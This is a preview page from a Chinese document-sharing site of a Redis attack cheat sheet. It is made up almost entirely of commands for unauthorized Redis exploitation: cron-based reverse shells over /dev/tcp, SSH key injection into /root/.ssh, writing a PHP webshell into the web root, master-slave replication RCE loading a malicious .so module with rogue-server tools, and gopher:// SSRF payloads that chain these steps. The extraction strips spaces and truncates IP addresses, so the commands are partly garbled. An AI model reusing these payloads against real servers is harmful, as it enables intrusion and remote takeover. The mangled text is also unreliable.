redis攻防redis利用總結(jié)_第1頁
redis攻防redis利用總結(jié)_第2頁
redis攻防redis利用總結(jié)_第3頁
redis攻防redis利用總結(jié)_第4頁
redis攻防redis利用總結(jié)_第5頁
已閱讀5頁,還剩3頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

PAGE1redis利用總結(jié)主講moonsec利用計(jì)劃任務(wù)反彈shell/Fly_hps/article/details/102690282centos成功ubuntu失敗setxx"\n*****bash-i>&/dev/tcp/13/99990>&1\n"configsetdir/var/spool/cron/configsetdbfilenamerootsaveecho-e"\n\n*/1****/bin/bash-i>&/dev/tcp//12340>&1\n\n"|redis-cli-h29-xset1

redis-cli-h29configsetdir/var/spool/cron/

redis-cli-h29configsetdbfilenameroot

redis-cli-h29save redis密鑰登錄ssh生成密鑰公鑰ssh-keygen-trsa防止亂碼導(dǎo)出key(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>key.txt導(dǎo)入內(nèi)容catkey.txt|redis-cli-h08--passpass123-xsetxxx--pass是登錄密碼無密碼可不填設(shè)置路徑configsetdir/root/.ssh設(shè)置文件名configsetdbfilenameauthorized_keys保存savessh登錄ssh-iid_rsaroot@08redis寫webshell08:6379>configsetdir/var/www/html/08:6379>configsetdbfilenameshell.php08:6379>setx"<?phpphpinfo();?>"08:6379>save利用主從復(fù)制RCE漏洞存在于4.x、5.x版本中,Redis提供了主從模式,主從模式指使用一個(gè)redis作為主機(jī),其他的作為備份機(jī),主機(jī)從機(jī)數(shù)據(jù)都是一樣的,從機(jī)只負(fù)責(zé)讀,主機(jī)只負(fù)責(zé)寫。在Reids4.x之后,通過外部拓展,可以實(shí)現(xiàn)在redis中實(shí)現(xiàn)一個(gè)新的Redis命令,構(gòu)造惡意.so文件。在兩個(gè)Redis實(shí)例設(shè)置主從模式的時(shí)候,Redis的主機(jī)實(shí)例可以通過FULLRESYNC同步文件到從機(jī)上。然后在從機(jī)上加載惡意so文件,即可執(zhí)行命令。受害人就是從機(jī)so文件攻擊者就是主機(jī)so文件工具下載/n0b0dyCN/redis-rogue-server/Testzero-wz/Awsome-Redis-Rogue-Serverpython3redis-rogue-server.py--rhost09--lhost45反彈shell監(jiān)聽端口nc-lvnp9999如果遇上帶密碼的改一下腳本就可以了。ssrfredis反彈shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquitgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252019%252021000%250d%250aquit導(dǎo)入模塊gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520./exp.so%250d%250aquit關(guān)閉主從gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aslaveof%2520NO%2520ONE%250d%250aquit設(shè)置數(shù)據(jù)庫名gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit反彈shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250asystem.rev%252019%25206666%250d%250aquit本地redis主從復(fù)制RCE反彈shellkali命令nc-lvnp2333python3redis_rogue_server.py-v-pathexp.soubuntu上操作configsetdir/tmpconfigsetdbfilenameexp.soslaveof1921000moduleload./exp.soslaveofNOONEsystem.rev192333

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論